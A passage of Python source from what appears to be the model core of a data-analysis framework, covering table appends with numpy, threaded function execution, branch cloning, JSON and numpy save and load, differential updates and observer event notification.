self.model[id]=numpy.full(dataLen,numpy.nan)
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],numpy.full(dataLen,numpy.nan))
return True
def append_table(self,blob,autocreate=True,autopad=True, timeSorted = False):
"""
this function accepts a dictionary containing paths and values and adds them as a row to a table
if autoPad is True: it is allowed to leave out columns, those will be padded with numpy.inf,
if autocreate is True: it is allowed to add unknown colums, those will be added automatically under the given name
Args:
blob(dict):
keys: node descriptors,
values: value to be appended to the table (scalar or list per variable is allowed
the times should be given in a variable ending with ".time"
if the table exists already and has another node for the time-values, then we take the .time values and put them on the timenode
autocreate(bool): if set to true and the nodes or table in the dict do not exist yet, we autocreate a table
autopad(bool) if set to true, we automatically pad values in an existing table if variables of the table are not part of the blob
doing so, we keep consistent lenght for all columns of a table
"""
#first check if we need to autocreate something, also check if we have multiple tables in play
with self.lock:
autocreates = []
tableId = None
columnsId = None
numberOfRows = None
for key in blob:
id = self.__get_id(key)
if not id:
if not autocreate:
self.logger.warn("appending table with unknown variables")
return None
else:
#we create this thing later
autocreates.append(key)
else:
#the id was found, let's find the right table
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
#this is our table
if not tableId:
tableId = self.model[ref]["parent"]
columnsId = ref
numberOfRows = len(self.model[id]["value"])
else:
if tableId != self.model[ref]["parent"]:
self.logger.warn("mixed tables request")
return None
self.logger.debug("append table "+str(self.get_browse_path(tableId)))
if autocreates and autocreate:
#do we even have to create our table?
if not tableId:
#make a table structure based on the names given
tableName = autocreates[1].split('.')[1]+"_autotable"
tableId = self.create_node(parent="root",name=tableName,properties={"type":"table"})
columnsId = self.create_node(parent=tableId,name="columns",properties={"type":"referencer"})
timeId = self.create_node(parent=tableId, name="timeField", properties={"type": "referencer"})
numberOfRows=0
else:
#if we don't create the table, here is our timeId
timeReferencer = self.get_child(tableId, "timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
#we also then don't create any new time-field
autocreates = [path for path in autocreates if path[-5:]!=".time"]
self.logger.debug(f"table var autocreates: {autocreates}")
for path in autocreates:
id = self.create_node_from_path(path,properties={"type":"column"})
self.model[id]["value"]=numpy.full(numberOfRows,numpy.inf)
self.add_forward_refs(columnsId,[id])
if path.split('.')[-1]=="time":
#we just created the time field, we must also give the table struct the info
self.add_forward_refs(timeId,[id])
tableColumnIds = self.get_leaves_ids(columnsId) # a list of the ids of the columns
timeReferencer = self.get_child(tableId,"timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
timePath = None
for path in blob:
if path[-5:] == ".time":
timePath = path
if not timePath:
self.logger.error("no time path given")
return False
#now make arrays of all values
for k,v in blob.items():
if type(v) is list or type(v) is numpy.ndarray:
blob[k]=numpy.asarray(v,dtype=numpy.float64)
else:
blob[k] = numpy.asarray([v], dtype=numpy.float64)
valuesLen = len( blob[list(blob.keys())[0]] )
tableLen = len ( self.get_value(timeId))
if not timeSorted:
#just append
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.append(self.model[id]["value"],blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.append(self.model[id]["value"],numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#now trigger observser
self.__notify_observers(self.get_leaves_ids(columnsId),"value")
else:
#time sorted: find a place to insert the data in the times
currentTimes = numpy.asarray(self.get_value(timeId),dtype=numpy.float64)
startTime = blob[timePath][0]
endTime = blob[timePath][-1]
firstIndexGreaterStart, = numpy.where(currentTimes>startTime) #where returns tuple
if len(firstIndexGreaterStart) == 0:
firstIndexGreaterStart = tableLen
else:
firstIndexGreaterStart=firstIndexGreaterStart[0]
firstIndexGreaterEnd, = numpy.where(currentTimes > endTime)
if len(firstIndexGreaterEnd) == 0:
firstIndexGreaterEnd = tableLen
else:
firstIndexGreaterEnd=firstIndexGreaterEnd[0]
if firstIndexGreaterEnd != firstIndexGreaterStart:
self.logger.error("we can't insert the data in a row-wise time manner, only as block")
return False
startIndex = firstIndexGreaterStart # the position to insert the incoming data
self.logger.debug(f"insert data @{startIndex} of {tableLen}")
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#
pass
return True
def __show_subtree(self,rootId):
currentBrowsePath = self.get_browse_path(rootId)
indentation = "| "*(len(currentBrowsePath.split('.'))-1)
print (indentation+"-",self.model[rootId]["name"],end="")
noShowProperties=["name","parent","children"]
for property in self.model[rootId]:
try:
if property=="value" and len(self.model[rootId]["value"])>10:
print(",len:"+str(len(self.model[rootId]["value"])),end="")
except:
pass
if not property in noShowProperties:
try:
#if this entry has a len and the len is larger then 20, show only a part of it
if len(self.model[rootId][property]) > 10:
print("," + property + "=" + str(self.model[rootId][property][0:10])+"...("+str(len(self.model[rootId][property]))+")", end="")
else:
print("," + property + "=" + str(self.model[rootId][property]), end="")
except:
print("," + property + "=" + str(self.model[rootId][property]), end="")
if self.model[rootId]["type"]=="timeseries":
print(","+self.time_series_get_info(rootId), end="")
print("")
for child in self.model[rootId]["children"]:
self.__show_subtree(child)
def execute_object_function(self,desc,functionName,parameter=None):
with self.lock:
id = self.get_id(desc)
object = self.get_object(id)
if not object:
return False
try:
functionPointer = getattr(object,functionName)
self.executionQueue.put({"functionPointer":functionPointer,"parameter":parameter,"id":id})
return True
except:
self.logger.error(f"function {functionName} not sttr of object {desc} {object}")
return False
def execute_function(self,desc,parameter = None):
"""
create a thread to execute a function there,
if the function has autoReload, we re-import the external
file
Args:
desc: node descriptor of the node (type "function") to be executed
Returns:
True if the execution thread was launched
"""
with self.lock:
id = self.get_id(desc)
if self.model[id]["type"]!= "function":
return False
functionName = self.model[id]["functionPointer"]
if not functionName in self.functions:
self.logger.error(f"can't find function {functionName} in global list")
return False
functionNode = self.get_node(id)
executionType = functionNode.get_child("control").get_child("executionType").get_value()
if executionType in ["async","sync"]:
self.executionQueue.put(id)
self.logger.info(f"function {desc} queued for execution")
return True
elif executionType =="threaded":
self.logger.info(f"function {desc} started in thread")
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
else:
self.logger.error(f"function {desc} cant be started, unknown execution type {executionType}")
return False
#check if function is interactive, then we reload it right now
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
#if self.functions[functionName]["isInteractive"]:
# must reload the module
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module,functionName.split('.',1).pop())
#now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#here, the lock is open again!
try:
if executionType == "async" or executionType == "threaded":
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
elif executionType == "sync":
self.__execution_thread(id) # call it sync here
return True
else:
self.logger.error("unsupported execution type"+str(executionType)+" in fuction"+str(id))
raise(Exception)
except:
return False
def start_function_execution_thread(self):
self.functionExecutionRunning = True
self.functionExecutionThread = threading.Thread(target=self._function_execution_thread)
self.functionExecutionThread.start()
def _function_execution_thread(self):
while self.functionExecutionRunning:
try:
nextId = self.executionQueue.get(timeout=1)
self.logger.info(f"now executing function {str_lim(nextId,300)}")
self.__execution_thread(nextId)
except:
pass
def delete(self):
self.functionExecutionRunning = False
def exit(self):
self.delete()
def close(self):
self.delete()
def __dispatch(self,function,timeout,param):
thread = threading.Thread(target=self.__dispatch_thread_function, args=[function,timeout,param])
thread.start()
def __dispatch_thread_function(self,function,timeout,param):
time.sleep(timeout)
function(param)
#exit thread
def reset_progress_bar(self,controlNode):
controlNode.get_child("progress").set_value(0)
def __clone_children(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
for childName,childInfo in self.get_children_dict(source).items():
childId = childInfo["id"]
if childInfo["type"] in ["timeseries","file","column"]:
self.logger.debug(f"clone skip node {childInfo['name']}")
continue
newProps = {k:v for k,v in childInfo.items() if k not in ["parent","children","backRefs","forwardRefs","browsePath","id","name"]}
cloneId = self.create_node_from_path(destPath+"."+childInfo["name"],properties=newProps)
grandChildren = self.get_children_dict(childId)
if grandChildren != {}:
self.__clone_children(childId,cloneId)
def __clone_referencer_targets(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
childIds = self.get_node_info(sourcePath)["children"]
while childIds:
id = childIds.pop()
info = self.get_node_info(id)
if info["type"]=="referencer":
newreferencer = self.get_browse_path(id).replace(sourcePath, destPath)
#now check: if the referencers points to something inside, we do the same but in the target root, else we take it as it is
for targetId in info["forwardRefs"]:
targetPath = self.get_browse_path(targetId)
newTargetPath = targetPath.replace(sourcePath,destPath)# if not found, we get it unchanged
self.add_forward_refs(newreferencer,[newTargetPath])
childIds.extend(info["children"])
def clone(self,desc):
"""
clone a node and all its subnodes (a whole branch)
we will create all nodes which existed in the source branch, for the referencers we use this stategy:
references pointing to a node under the source branch will be translated to references in the target branch
poining to the corresponding new node in the target branch
references pointing to outside the source branch will also be created in the cloned branch pointing to
the same target
Args:
desc: the source node descriptor
"""
sourcePath = self.get_browse_path(desc)
if not sourcePath:
return False
targetPath = sourcePath+"_"+getRandomId()
sourceInfo = self.get_node_info(desc)
transferRoot = self.create_node_from_path(targetPath,properties={"type":sourceInfo["type"]})
#now iterate over the nodes and children and create the same nodes
self.__clone_children(desc,transferRoot)
self.__clone_referencer_targets(sourcePath,transferRoot)
return True
def execute_synchronous(self,id):
"""
execute a function synchronously here (this can be useful when executing a function within another
"""
return self.__execution_thread(id)
def __execution_thread(self,id):
"""
the thread function to execute functions
it currently uses the global lock so it will lock out any other work on the model during execution
all inputs and outputs are found in the model
we also set the status and result from here, not needed to do that in the function
Args:
id: the node id of the function to be executed or the dict for an object call
"""
try:
if type(id) is str:
if self.model[id]["type"] == "function":
isFunction = True
else:
isFunction = False
with self.lock:
if isFunction:
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
# must reload the module
functionName = self.model[id]["functionPointer"]
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module, functionName.split('.', 1).pop())
# now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
#check the function
functionName = self.model[id]["functionPointer"]
functionPointer = self.functions[functionName]['function']
self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
else:
functionPointer = id["functionPointer"]
functionName = functionPointer.__name__
parameter = id["parameter"]
id = id["id"] #for deeper down
#now set some controls
try:
node = self.get_node(id)
controlNode = node.get_child("control")
targetId = self.get_id("root.system.progress.targets")
if targetId:
self.disable_observers()
self.remove_forward_refs(targetId)
self.add_forward_refs(targetId,[controlNode.get_child("progress").get_id()])
self.enable_observers()
# we don't signal these things
self.disable_observers()
controlNode.get_child("status").set_value("running")
controlNode.get_child("result")#.set_value("pending")
controlNode.get_child("progress").set_value(0)
#controlNode.get_child("signal").set_value("nosignal")
startTime = datetime.datetime.now()
controlNode.get_child("lastStartTime").set_value(startTime.isoformat())
self.enable_observers()
except:
self.logger.error("error during execution preparation, this can be critical, maybe disabled observers")
self.log_error()
pass
# model lock open: we execute without model lock
if isFunction:
result = functionPointer(node) # this is the actual execution
else:
result = functionPointer(parameter)
#now we are back, set the status to finished
duration = (datetime.datetime.now()-startTime).total_seconds()
with self.lock:
# this is a bit dangerous, maybe the node is not there anymore?, so the
# inner functions calls of node.xx() will return nothing, so we try, catch
try:
self.logger.debug(f"function {functionName} execution completed in {duration} ")
self.disable_observers() # we don't signal these
controlNode.get_child("lastExecutionDuration").set_value(duration)
controlNode.get_child("status").set_value("finished")
controlExecutionCounter = controlNode.get_child("executionCounter")
controlExecutionCounter.set_value(controlExecutionCounter.get_value() + 1)
controlProgress = controlNode.get_child("progress")#.set_value(0)
controlProgress.set_value(0)
self.enable_observers()
self.notify_observers([controlExecutionCounter.get_id(),controlProgress.get_id()],"value")
if not isFunction:
result = True # for execution of member function we don't have a general return code
if result == True:
controlNode.get_child("result").set_value("ok")
self.publish_event("result of " + str(functionName) + ": " + controlNode.get_child("result").get_value())
else:
if controlNode.get_child("result").get_value() == "pending":
#if the functions hasn't set anything else
controlNode.get_child("result").set_value("error")
#also publish this result
self.publish_event("error in " + str(functionName) + ": " + controlNode.get_child("result").get_value())
# except:
# self.logger.error("problem setting results from execution of #"+str(id))
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id" +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
pass
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id " +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
controlNode.get_child("status").set_value("interrupted")
controlNode.get_child("result").set_value("error:"+errorString)
controlNode.get_child("progress").set_value(0)
self.publish_event("error in "+str(functionName)+": "+errorString)
return
def get_error(self):
s=f"{sys.exc_info()[1]}, {traceback.format_exc()}"
return s
def log_error(self):
self.logger.error(self.get_error())
def show(self):
"""
show the current model as a ascii tree on he console
"""
with self.lock:
self.__show_subtree("1")
def save_model(self):
return self.save(self.currentModelName,includeData=False)
# save model and data to files
def save(self, fileName, includeData = True):
"""
save the model to disk, save the tables separately
the model file will be saves as ./models/fileName.model.json and the tables will be saved under
./models/filename.tablePath.npy
Args:
fileName to store it under, please don't give extensions
includeData : if set to False, we DONT store the values of node types tables or files to disk
"""
self.logger.debug(f"save model as {fileName} with data {includeData}")
self.publish_event(f"saving model {fileName}...")
with self.lock:
try:
m = self.get_model_for_web() # leave out the tables
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
if includeData:
self.ts.save(os.path.join(model_directory, model_filename))
f = open(os.path.join(model_directory, model_filename)+ ".model.json", "w")
f.write(json.dumps(m, indent=4))
f.close()
self.currentModelName = fileName
self.publish_event(f"model {fileName} saved.")
return True
except Exception as e:
self.logger.error("problem sving "+str(e))
self.publish_event(f"saving model {fileName} error")
return False
def move(self, nodeList, newParent, newIndex=None):
"""
move a list of nodes under a new Parent on the child position new Index
if the newParent is a referencer, we are creating references instead and keep the nodes where they are
Args:
nodeList [string]: a list of node descriptors of the nodes to move, scalar is also allowed
NewParent [string] a node descriptor for the new parent under which the nodes should appear
new Index int : the position on the children of newParent where the new nodes should appear
Returns:
True
"""
with self.lock:
if not type(nodeList) is list:
nodeList = [nodeList]
nodeIds = self.get_id(nodeList)
parentId = self.get_id(newParent)
if not parentId: return False
#check the special case that the parent is a referencer:
if self.model[parentId]["type"] == "referencer":
self.add_forward_refs(parentId,nodeIds)
self.logger.info("moves nodes as references "+ parentId + str(nodeIds))
return True
#for all others, we start moving nodes
self.logger.debug(f"model.move():{nodeIds}=>{parentId}")
try:
for id in nodeIds:
if id == parentId or id == "1":
self.logger.error("cant move " +id + " to " + parentId)
continue
oldParent = self.model[id]["parent"]
self.model[oldParent]["children"].remove(id) # remove the child from the old parent
self.model[id]["parent"]=parentId
if newIndex:
self.model[parentId]["children"].insert(newIndex,id) # at specific index
else:
self.model[parentId]["children"].append(id) # at the end
self.__notify_observers(oldParent, "children")
self.__notify_observers(parentId, "children")
except Exception as ex:
self.logger.error(f"problem moving {nodeIds} to new parent {parentId} this is critical, the model can be messed up {ex}")
return True
def clean_ts_entries(self):
"""
remove timeseries data that has no node and remove nodes (timeseries that have no timeseries data
"""
self.logger.debug("clean_ts_entries(): check consistency of model and timeseries table..")
deleteNodes = []
for id, node in self.model.items():
if node["type"] == "timeseries":
info = self.ts.get_info(id)
if "not found" in info:
self.logger.info(f" {node['name']}: has no time series date entry in the ts table, remove node")
deleteNodes.append(id)
for id in deleteNodes:
self.delete_node(id)
deleteTs=[]
for id in self.ts.get_items():
if id not in self.model:
self.logger.info(f" timeseries data {id} has no corresponding node in model .. delete the ts-data")
self.ts.delete(id)
def load(self,fileName,includeData = True, update = False):
"""
replace the current model in memory with the model from disk
please give only a name without extensions
the filename must be in ./models
Args:
fileName(string) the name of the file without extension, we also accept a dict here: a list of nodes
includeData bool: if set to false, the values for tables and files will NOT be loaded
update : if set to true, auto correct missing entries in known templates
"""
result = False
self.logger.info(f"load {fileName}, includeData {includeData}")
with self.lock:
self.publish_event(f"loading model {fileName}...")
self.disable_observers()
try:
if type(fileName) is str:
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
#if os.path.dirname(fileName)
f = open(os.path.join(model_directory, model_filename) + ".model.json","r")
model = json.loads(f.read())
self.model = model
f.close()
self.currentModelName = fileName
elif type(fileName) is dict:
self.model = copy.deepcopy(fileName) # take over the nodes
self.currentModelName = "fromNodes"
#now also load the tables
self.globalIdCounter = 0 #reset the counter and recover it further down
for nodeId in self.model:
if not self.idCreationHash:
#we only recover the counter if necessary
if int(nodeId)>self.globalIdCounter:
self.globalIdCounter = int(nodeId) # here, we recover the global id counter
if includeData:
if "version" in self.model["1"] and self.model["1"]["version"]>=0.1:
#new loader
self.ts.load(os.path.join(model_directory, model_filename))
else:
self.logger.debug("time series compatibility loader")
#we assume data in file and use the standard inmemory table storage
for nodeId in self.model:
if self.get_node_info(nodeId)["type"] == "table":
table = self.get_browse_path(nodeId)
data = numpy.load(os.path.join(model_directory, model_filename) + "." + table + ".npy")
#now find the time data, apply it to all variables
timeId=self.find_table_time_node(table)
ids = self.get_leaves_ids(table+".columns")
for id, column in zip(ids, data):
if id==timeId:
times = column
else:
self.ts.create(id)
self.set_properties({"type":"timeseries"},id)
self.ts.set(id,values=column)
for id in ids:
if id == timeId:
continue
self.ts.set(id,times=times)
self.clean_ts_entries() # make sure the model and ts table is consistent
self.instantiate_all_objects()
self.reset_all_objects()
self.enable_observers()
self.publish_event(f"loading model {fileName} done.")
self.model["1"]["version"]=self.version #update the version
result = True
except Exception as e:
self.logger.error("problem loading"+str(e))
self.publish_event(f"loading model {fileName} error.")
self.enable_observers()
result = False
if update:
self.update() # automatically adjust all widgets and other known templates to the latest style
return result
def create_differential_handle(self, user = None):
"""
make a copy of the current model and keep it as copy, create a handle for it and return that handle
this new handle is at the same time the id of te new "user", all the following requests for differential updata
will be referred to this user id
Returns:
a hash handle for the current model
"""
with self.lock:
#newHandle = str(uuid.uuid4().hex) # make a new unique handle
newHandle = str(self.diffHandleCounter)
self.diffHandleCounter += 1
if not user:
#also create a new user
user = newHandle
self.differentialHandles[newHandle]= {
"user":user,
"model":self.get_model_for_web(),
"time": int(time.time()),
"updateCounter": self.modelUpdateCounter
}# make an entry by copying the whole model
return newHandle
def get_differential_update(self,oldHandle,newHandle=None):
"""
this function takes the copy of the model (hopefully) held under handle and compares it to the current model:
the differences are analyzed and returned, t
to avoid endless storage of old references, we have the deletin stategy: for every "user" we keep a max of
self.differentialHandlesMaxPerUser, if we have more, we delete the oldest
Args:
oldHandle (string): the unique id of the old version of the model
newHandle (string): the unique id of the new version to compare to, if not given, we take the current
and will automatically make a new entry for the current
delOld: if set, we remove the old entry from the memorized models with a one step delay
Returns (dict):
containing information about the changes between and old and new version of the model
key values:
"handle":(string): the handle under which we find the new version of the model
"newNodes": (dict) nodes which are new to the tree in the form Nodeid:{properties}
"deletedNodeIds": (list) list of node ids which have been deleted
"modifiedNodes": (dict) nodes which have changed properties: if so, we give the full updated node back
"""
with self.lock:
diff={"handle":None,"newNodes":{},"deletedNodeIds":[],"modifiedNodes":{}} # the response for web
if oldHandle not in self.differentialHandles:
return None # the old handle does not exist, we can't handle this request
if newHandle is None:
# this is the standard case, we generate the new handle now
user = self.differentialHandles[oldHandle]["user"]
# we make a quick check if the model has changed at all, if not we simply return the old handle
if self.differentialHandles[oldHandle]["updateCounter"] == self.modelUpdateCounter:
self.logger.debug("get_differential_update: shortcut for no changes")
diff["handle"] = oldHandle
return diff
newHandle = self.create_differential_handle(user=user) # this function also makes a copy of the current tree and puts it in the self.differential handles list
newModel = self.differentialHandles[newHandle]["model"]
else:
if newHandle in self.differentialHandles:
newModel = self.differentialHandles[newHandle]
else:
return None # the newhandle did not exist
oldModel = self.differentialHandles[oldHandle]["model"]
# delete strategy: for every "user" we track a maximum of self.differentialHandlesMaxPerUser
users={}
for handle,entry in self.differentialHandles.items():
user = entry["user"]
if user not in users:
users[user]={}
users[ user][ handle ] = entry["time"]
for user,entries in users.items():
if len(entries)> self.differentialHandlesMaxPerUser:
#must clean up history of that user, entries is a dict of handle:time
sortedKeys =[key for key, value in sorted(entries.items(), key=lambda item: item[1])]
removeKeys = sortedKeys[:-self.differentialHandlesMaxPerUser]
self.logger.debug("remove handle"+str(removeKeys)+" of user"+user)
for key in removeKeys:
del self.differentialHandles[key]
#find the changes between the models
for newNodeId in newModel:
if newNodeId not in oldModel:
#this node is not found in the old model, so it is new
diff["newNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
else:
#this node is in both models, check if there was a change insight the nodes
#for a deep comparison, serialize them
newNodeSerialized = json.dumps(newModel[newNodeId],sort_keys=True)
oldNodeSerialized = json.dumps(oldModel[newNodeId],sort_keys=True)
if newNodeSerialized != oldNodeSerialized:
#something is different, so return that node
diff["modifiedNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
#now check for deleted once, these appear in the old but not in the new
diff["deletedNodeIds"]=list(set(oldModel.keys())-set(newModel.keys()))
diff["handle"]=newHandle
return diff
def publish_event(self, event):
"""
send out an event e.g. for status information
event to send looks like
event = { "id": 1123,
"event": "system.status"
"data:"{"nodeId":xx, "value":..,"function":... ...}
}
Args
event [string or dict]
"""
self.logger.debug(f"publish_event ({event})")
self.modelUpdateCounter += 1
if type(event) is str:
#make sure the formatting is json compatible
event = event.replace("'",'"')# ' => "
event={"event":"system.status","data":{"text":event}}
event["id"]=self.modelUpdateCounter
for observerObject in self.observers:
observerObject.update(event)
def disable_observers(self):
self.lock_model()
#with self.lock:
self.disableObserverCounter += 1
#self.logger.debug(f"disable_observers() {self.disableObserverCounter}")
def enable_observers(self):
self.release_model()
if self.disableObserverCounter >0:
self.disableObserverCounter -=1
else:
self.logger.error("enable_observers without disable observers")
#self.logger.debug(f"enable_observers() {self.disableObserverCounter}")
def notify_observers(self, nodeIds, properties, eventInfo={}):
"""
public wrapper for __notify observser, only expert use!
"""
#self.logger.info(f"notify observses(), {str_lim(nodeIds,50)}, {properties}")
return self.__notify_observers(nodeIds,properties,eventInfo)
def get_referencers(self,descList,deepLevel = 0):
"""
get the references to this node via backtraversing the leaves algorithm
we look for parents through deepLevel levels and from there on we look back for referencers
deepLevel is the the level of extra parent level: 1 means the one more level, two means two extra level
Returns:
a list of referencers ids that point to the given descList nodes
"""
#convert all to nodes to ids
if type(descList) is not list:
descList = [descList]
startList = set([self.__get_id(node) for node in descList])
startList =set([node for node in startList if node]) #remove None and duplicates
referencers = set() #we collect the parents here and avoid duplicates
#in this first iteration we take the referencers pointing directly to the nodes or their parents
workList = startList.copy()
for level in range(deepLevel+1):
#from this level we take the backrefs
for id in workList:
referencers.update(self.model[id]["backRefs"])
#prepare parents for next round
parents=set()
for id in workList:
myParent=self.model[id]["parent"]
if myParent not in ["0","1"]: #root
parents.update([myParent]) #!use list to avoid break into chars
#now take the parents as currentList
workList = parents.copy()
if workList ==[]:
break #avoid turning cycles for nothing
#second step:
# now we take all final referencers and all referencers to those referencers with no limit
# (go back the leaves algorithm)
collectedReferencers = referencers.copy() # we take all we have so far
while True:
workList=set()
for id in referencers:
workList.update(self.model[id]["backRefs"])
collectedReferencers.update(workList)
if not workList:
break
else:
#one more round
referencers = workList.copy()
return list(collectedReferencers)
def __notify_observers(self, nodeIds, properties, eventInfo={} ):
"""
this function is called internally when nodes or properties have changed. Then, we look if any
observer has to be triggered
we also increase the counter and time on the root.observers.modelObserver
Args:
nodeId: the nodeIds where a change occurred
properties: the property or list of properties of the node that has changed
"""
#exception for the progress node
if type(properties) is not list:
properties = [properties]
if type(nodeIds) is not list:
nodeIds = [nodeIds]
if self.disableObserverCounter>0:
#only one exception: progress works always
mustReturn = True
with self.lock:
for nodeId in nodeIds:
if self.model[nodeId]["name"] == "progress":
mustReturn = False
break
if mustReturn:
#self.logger.info(f"__notify_observers disable return {nodeIds} {properties}")
return
with self.lock:
# this is for the tree updates, any change is taken
self.modelUpdateCounter = self.modelUpdateCounter + 1 #this is used by the diff update function and model copies
collectedEvents=[]
enableTree = self.get_node("root.system.enableTreeUpdateEvents")
if enableTree and enableTree.get_value()==False:
pass
else:
# Notify all observers about the tree update, this is a standard
event = {
"id": self.modelUpdateCounter,
"event": "tree.update",
"data": ""}
collectedEvents.append(event) # send later
names =[self.model[id]["name"] for id in nodeIds]
self.logger.debug(f"__notify_observers {len(nodeIds)} ids:{str_lim(names,100)}: {properties}")
triggeredObservers=[] # we use this to suppress multiple triggers of the same observer, the list holds the observerIds to be triggered
#p=utils.Profiling("__notify.iterate_nodes")
referencers = self.get_referencers(nodeIds,deepLevel=5)#deeplevel 5: nodes can be organized by the user in hierachy
nodeId = self.__get_id(nodeIds[0])#take the first for the event string,
#p.lap(f"get refs for {nodeId}")
self.logger.debug(f"__notify on {len(referencers)} referencers: {str_lim([self.get_browse_path(id) for id in referencers],200)}")
for id in referencers:
if self.model[id]["name"] == "targets" and self.model[self.model[id]["parent"]]["type"] == "observer":
# this referencers is an observer,
observerId = self.model[id]["parent"]
observer = self.get_children_dict(observerId)
# check if trigger
if observer["enabled"]["value"] == True:
#self.logger.debug(f"{self.model[nodeId]['name']} is targeted by observer {self.get_browse_path(observerId)}")
if observerId in triggeredObservers:
self.logger.debug(f"we have triggered the observer {self.get_browse_path(observerId)} in this call already, pass")
continue
#self.logger.debug(f"check properties to triggered the observer {self.get_browse_path(observerId)}")
#check if any of the observed properties matches
propertyMatch = False
for property in properties:
if property in observer["properties"]["value"]:
propertyMatch=True
break
if not propertyMatch:
#self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} no property match ")
pass
else:
self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} for change in {property}")
self.model[observer["triggerCounter"]["id"]]["value"] = self.model[observer["triggerCounter"]["id"]]["value"]+1
self.model[observer["lastTriggerTime"]["id"]]["value"] = datetime.datetime.now().isoformat()
for funcNodeId in self.get_leaves_ids(observer["onTriggerFunction"]["id"]):
self.logger.debug(f"execute ontrigger function {funcNodeId}")
self.execute_function(funcNodeId)
if "triggerSourceId" in observer:
self.model[observer["triggerSourceId"]["id"]]["value"] = nodeId
if observer["hasEvent"]["value"] == True:
#self.logger.debug(f"send event {observer['eventString']['value']}")
#also send the real event
#self.modelUpdateCounter = self.modelUpdateCounter+1
event = {
"id": self.modelUpdateCounter,
"event": observer["eventString"]["value"],
"data": {"nodeId":observerId,"sourceId":nodeId,"sourcePath":self.get_browse_path(nodeId)}}
if self.model[nodeId]["type"] not in ["column","file","timeseries"]:
event["data"]["value"]=self.model[nodeId]["value"]
#some special handling
try:
if event["event"] == "system.progress":
progressNode = self.get_node(self.get_leaves_ids("root.system.progress.targets")[0])
event["data"]["value"] = progressNode.get_value()
event["data"]["function"] = progressNode.get_parent().get_parent().get_browse_path()
else:
eventNode = self.get_node(observerId)
extraInfoNode = eventNode.get_child("eventData")
if extraInfoNode:
extraInfo = extraInfoNode.get_value()
if type(extraInfo) is not dict:
extraInfo={"info":extraInfo}
event["data"].update(extraInfo)
if eventInfo:
event["data"]["_eventInfo"]=eventInfo #put this only if we have info
except Exception as ex:
self.logger.error(f"error getting extra info for event {ex}, {sys.exc_info()[0]}")
#for all other events, take the event data if there is one (as json)
self.logger.debug(f"generate event {event}")
collectedEvents.append(event)
triggeredObservers.append(observerId)# next time, we don't trigger
#p.lap("complete backrefs {nodeId}, {backrefs}")
#self.logger.debug(p)
#self.logger.debug("now send the events")
#event = copy.deepcopy(event)
for event in collectedEvents:
for observerObject in self.observers:
observerObject.update(event)
self.logger.debug(f"done sending {len(collectedEvents)} events")
def create_observer(self):
# Instantiate a new observer
observer = Observer(self)
# attach it to the model
self.attach_observer(observer)
# return the observer
return observer
def attach_observer(self, observer):
# Add a new observer
self.logger.debug(f"Adding new observer: {id(observer)}")
with self.lock:
self.observers.append(observer)
def detach_observer(self, observer):
with self.lock:
try:
self.observers.remove(observer)
self.logger.debug(f"Removing observer: {id(observer)}")
except ValueError:
self.logger.exception("Trying to remove an observer which doesn't exist in the list of observers.")
def set_column_len(self,nodeDescriptor,newLen):
"""
adjust the len of a colum, extension are inf-padded,
Args: nodeDescriptor: the node
newLen (int) the new lenth of the column
Returns:
the new value set or none if problem
"""
with self.lock:
id = self.get_id(nodeDescriptor)
if not id: return None
if self.model[id]["type"] != "column":
